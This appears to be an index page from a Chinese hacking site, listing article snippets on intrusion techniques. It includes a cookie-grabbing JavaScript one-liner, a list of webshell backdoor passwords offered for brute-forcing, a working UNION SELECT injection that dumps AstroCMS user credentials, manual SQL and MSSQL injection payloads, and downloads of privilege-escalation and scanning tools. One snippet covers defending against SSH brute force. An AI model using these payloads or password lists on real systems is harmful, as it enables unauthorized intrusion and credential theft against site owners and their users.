google hack技术资料
利用google完全是可以对一个站点进行信息收集和渗透的,下面我们用google对特定站点进行一次测试。www.webshell.cc是全国著名大学之一,一次偶然的机会我决定对其站点进行一次测试(文中所涉及该学校的信息均已经过处理,请勿对号入座:) 首先用google先看这个站点的一些基本情况(一些细节部分就略去了): site:webshell.cc 从返回的信息中,找...
手工抓取COOKIE
javascript:alert;window.clipboardData.setData('text',document.cookie); 在IE里输入以上代码,然后直接用ctrl+V,粘贴出来的内容就是你所要抓的cookie了。
国内各类 WebShell 密码大全 爆破、社工用 webshell-password
国内各类 WebShell 后门密码大全,已剔除重复: 名称 密码 6.0 VIP(防破解版 12345 - yanghai或者168888 (中国数据) rinima . tg [D.s.T]会员专用WebShell darkst [HxHacK]华夏黑客联盟 192298273208298273192298273185298273187298273195298273 [华夏黑客小豪]Shell...
AstroCMS多重远程缺陷及修复
下载地址: http://www.astrocms.com/ 忘记密码处注射: /registration/forgot/ a' union select 0,0,0,0,concat_ws(0x3a,login,password,email,status ,level),0,0,0,0,0,0,0 from auth_users where id=5# id=6 - usually admin ...
用SHELL脚本来防止SSH和vsftpd暴力破解
我的一台公网服务器,由于网站采取的是双备份策略,所以开放了vsftpd的21端口,近来发现许多人在尝试暴力破解vsftpd和ssh,我随便看了看/var/log/secure日志,显示如下: 118.33.110.52=2834 119.145.254.77=37 121.254.179.199=226 121.88.250.243=35 200.29.110.104=168 202.78.173...
SQL 手工注入大全
比方说在查询id是50的数据时,如果用户传近来的参数是50 and 1=1,如果没有设置过滤的话,可以直接查出来,SQL 注入一般在ASP程序中遇到最多, 看看下面的 1.判断是否有注入 ;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.判断数据库系统 ;and (select count(*) from sysobjects)>0 mssq...
1970年左右发现最早黑客技术——哨子
1970年左右发现最早黑客技术——哨子 约翰·德雷珀(John Draper)是最早被冠以“黑客”称号的家伙。出生于1944年,圈内人更熟悉的名称是“Captain Crunch”、“Crunch ”、“Crunchman”和“Cap'n Crunch” ,电话飞客先驱人物。约翰·德雷珀出生于美国空军工程师家庭,1964年,父唱子随,也进入了空军。当时驻守在阿拉斯加,开始干起了电话飞客的工作,...
手工MSSQL注入常用SQL语句
and exists (select * from sysobjects) //判断是否是MSSQL and exists(select * from tableName) //判断某表是否存在..tableName为表名 and 1=(select @@VERSION) //MSSQL版本 And 1=(select db_name()) //当前数据库名 and 1=(select @@ser...
星外目录扫描可写权限辅助工具
星外提权辅助工具提升提权成功率。原理是自动读所有可读的注册表, 并自动找注册表里面存在的路径信息,然后全部echo。结合阿D的那个 ASP目录扫描脚本效果更佳。 图2: 下载:finaly
顶级网站扫描工具WVS最新版下载
网站扫描工具,不需要安装。不像国内的那几个软件,扫描速度还可以。 遍历目录我喜欢哦。哈哈,蜘蛛厉害。有需要的就顶顶。上张图。 下载:WVS-1.24.121